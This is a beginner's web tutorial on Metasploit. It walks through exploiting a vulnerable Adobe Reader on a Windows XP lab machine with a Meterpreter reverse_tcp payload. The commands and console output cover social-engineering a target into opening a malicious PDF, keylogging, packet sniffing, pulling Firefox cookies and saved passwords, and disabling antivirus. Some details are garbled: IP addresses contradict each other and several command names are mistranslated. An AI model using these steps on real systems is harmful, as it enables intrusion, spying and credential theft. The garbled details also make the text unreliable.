Learn to Use Metasploit: Guide for Beginners

metasploit meterpreter
metasploit meterpreter

Last updated: October 16, 2023

Always wanted to learn how to use Metasploit but don't know where to start? Do not search anymore! In this article, we'll take you step-by-step through the features of Metasploit and show you how to use this powerful tool to test the security of your systems.

Whether you are a beginner or experienced in computer security, this article is for you! Get ready to become an expert in using Metasploit in no time.

What is Metasploit framework

Imagine being able to break into any computer system around the world, does that seem unachievable? Well, that’s where the Metasploit framework comes into play.

Metasploit is an incredibly powerful tool that allows you to exploit security vulnerabilities in computer systems. It is used by security professionals to test the security of their own systems, but also by hackers to break into other people's systems.

 

It contains a large database of exploit modules, payloads and post-exploitation scripts that can be used to automate security testing.

With Metasploit, you can perform penetration testing on your own systems to discover vulnerabilities before a hacker does.

In a few words, Metasploit is an essential tool for anyone interested in computer security, it gives you the means to become an ethical hacker and effectively protect your systems.

What can we do with Metasploit

The Framework allows you to do a lot of things like:

  • Scan and collect information about a target machine.
  • Detect and exploit vulnerabilities.
  • Increase the privileges of an operating system.
  • Install a backdoor to maintain persistent access.
  • Use the “Fuzzing” technique to test the robustness of software.
  • Use evasion tools to bypass security software.
  • Use payloads to run commands remotely on compromised systems.
  • Use pivot tools to propagate access to other connected systems.
  • Erase traces and logs to conceal malicious activity.

Main components of the Metasploit framework

The Metasploit framework is an incredibly powerful tool, but to get the most out of it, it's important to understand the different components that make it up.

Here are some of the main elements of Metasploit that will help you understand how this tool works:

  • MSFconsole : This is the main interface of Metasploit, this is where you can issue commands and interact with the different modules. It's where you'll spend most of your time when working with Metasploit.
  • Operating modules : These are the modules that allow you to exploit vulnerabilities discovered in target systems. There are modules for vulnerabilities of Windows, Linux, and many other operating systems.
  • Payloads : Payloads are pieces of code that are executed on compromised systems to perform specific tasks, such as executing remote commands, installing a backdoor, etc.
  • Post-operation modules : These modules allow you to collect information about compromised systems, maintain persistent access, bypass security protections, and more.
  • Auxiliary modules : These modules are used for specific tasks, such as scanning ports and retrieving target information.
  • Script modules : These modules allow you to run scripts to automate specific tasks, like exporting data, creating reports, etc.

By understanding these key components, you will be able to get the most out of Metasploit for testing the security of your systems.

Basic commands to use Metasploit?

We now move on to the most exciting part: using Metasploit.

Here are the basic steps to exploit a system with Metasploit:

  1. Collect information about the target, such as operating system version and installed network services. This information can be retrieved using port scanning and footprinting tools such as Nmap, Maltego and Nessus.
  2. Choose and configure an appropriate exploit based on the information gathered.
  3. Check if the target system is susceptible to the chosen exploit using verification commands.
  4. Choose and configure an appropriate payload.
  5. Run the exploit with the configured settings to attempt to exploit the vulnerability.

Exploit side

The commands we will see in the following section are used to select and configure an exploit for a specific target before executing it.

It is important to understand the options for each exploit and configure them appropriately to maximize the exploit's chance of success.

Here are the basic commands for using Metasploit exploits:

  • View all available exploits: show exploits
  • Search for a specific exploit: search nom_exploit
  • Select an exploit: use nom_exploit
  • Get information about an exploit: info nom_exploit
  • View exploit options: show options

Payload side

Payloads are used to define what the exploit will do once it succeeds. There are many types of payloads, ranging from simple command execution to remote shell installation. It is important to choose the appropriate payload for each situation and configure it correctly to maximize the chances of successful exploitation.

Here's how to use Metasploit payloads:

  • Show all available payloads: show payloads
  • Select a specific payload: set PAYLOAD nom_payload
  • See the payload options for configuration: show options

In general

  • Acquire help : help
  • Know the version of Metasploit: version
  • List all exploits, modules, playlists: search
  • Exit Metasploit: quit

Install and use Metasploit

Ready to test your computer security skills? So listen up!

To set up a proper test environment, you need to download and install kali linux virtually with vmware. And guess what? Metasploit is already pre-installed for your enjoyment.

Then download and install Windows XP to create a second virtual machine for you to experiment on.

But that's not all! In this second machine we will install a vulnerable version of the Adobe Acrobat Reader application. Yes, you heard right, vulnerable!

This vulnerability concerns Adobe Reader v9.0.0 (Windows XP SP3) and Adobe Reader v8.1.2 (Windows XP SP2). And be careful, because in certain cases, opening a PDF file with Adobe Acrobat Reader can cause a “Buffer overflow” and thus allow a malicious person to take control of a machine remotely.

Once you've installed your testing tools, launch your Metasploit console and show us what you're made of! And remember, learning is fun when it's exciting!

Exploit the Adobe Acrobat Reader flaw with Metasploit

Load the Payload

Are you ready to jump into the world of Metasploit? So, follow these simple steps to start your adventure!

To get started, open msfconsole.

  • Click on Applications.
  • Then, select Mining Tools.
  • Finally, click on Metasploit Framework.

Otherwise, use the “msfconsole” command in a terminal.

 

In a few seconds, a console will appear in front of you.

Now type the following commands:

search adobe_jbig2decode //search for adobe exploit
use exploit/windows/browser/adobe_jbig2decode // select exploit
exploit info/windows/browser/adobe_jbig2decode
Show options
set SRVHOST 192.168.64.5 // the IP address of the server used
set SRVPORT 80
set URIPATH //this is the URL used for the exploit
show targets
set targets 0
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.64.5

Here we use a payload called “reverse_tcp”. This means that we send a piece of code that will be executed on the target machine once we have exploited a security vulnerability. This will allow us to remotely connect to the target machine, even if it is protected by a firewall.

Please note:  In this case, the IP address 192.168.230.128 is the address of our virtual machine which contains the server which will store the infected PDF file. This means that we will use this IP address to access this virtual server and download the infected PDF file to perform our security tests.

Run the exploit

The module is correctly configured, we can launch the attack with the following command:

msf> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.230.128:4444
[*] Using URL: http://192.168.64.5:8080/
[*] Server started.

To set up our security test, we will start a temporary web server using the IP address 192.168.64.5.

Our temporary web server is then started with the following IP address: 192.168.64.5.

The next step is to use the technique known associal engineering to send this address to a target person. When this person clicks on the link, a malicious PDF file will be offered for download. If the person agrees to open it with Adobe Reader, Metasploit will tell you that the vulnerability exploitation was successful.

It is important to note that the IP address 192.168.230.1 is that of our second virtual machine under Windows XP which is configured to be vulnerable. It was on this machine that we installed a vulnerable version of Adobe Acrobat Reader to perform our security tests.

As this is a test, we will upload the malicious PDF file with our own account.

Open a Meterpteter session

All we have to do now is open a Meterpreter session remotely on the vulnerable machine:

msf> sessions -i 1
[*] Starting interaction with 1…

We now have full control of the second machine. Then we can do whatever we want.

For example, we can take screenshots remotely using the Espia extension from Meterpreter:

meterpreter> use espia
Loading extension espia… success.
screenshot hack.jpg Where to start a keylogger in order to capture everything typed on the keyboard:
keyscan_start
keyscan_dump
keyscan_stop

Or spy on the victim's network:

use sniffer
sniffer_interfaces //the available interfaces
sniffer_start 2 //We start the capture on interface 2
sniffer_stats 2 //Know how many packets captured
sniffer_dump 2 filename
// retrieve captured packets

Or open a command prompt dialog box:

meterpreter> shell
Process 892 created.
Channel 1 created.
(C) Copyright 1985-2001 Microsoft Corp.
C: Documents and Settings \ admin \ My documents>

Some Meterpreter commands

  • run enum_firefox: this command allows you to retrieve all information related to Firefox (cookies, history, saved password).
  • run get_application_list:  this command is used to find out the applications installed on the victim's computer.
  • run killav: deactivates the antivirus.
  • runkitrap0cd: automates the escalation of privilege.

There exists a hundred Meterpreter command which can be very useful...
Of course, the method described below can be used for other vulnerabilities affecting different software. It is possible to list all known exploits with the following command: Show feats

You can do another test with a more recent vulnerability, it is the Zero Day vulnerability in Internet Explorer.
Here is the full explanation in this post: How to exploit the Internet Explorer 0day vulnerability with Metasploit.

Conclusion

You have just discovered the incredible potential of Metasploit! It is not just a tool to exploit vulnerabilities in Adobe or Internet Explorer, but there are hundreds of exploits available to attack all types of machines.

Metasploit is a powerful tool that continues to evolve and surprise IT security professionals. We hope that through this computer guide you were able to master the basic commands of this amazing Framework.

And if you want to know more about Metasploit or have ideas for improving this page, don't hesitate to leave a comment! We are always happy to hear your opinions and help you better master IT tools.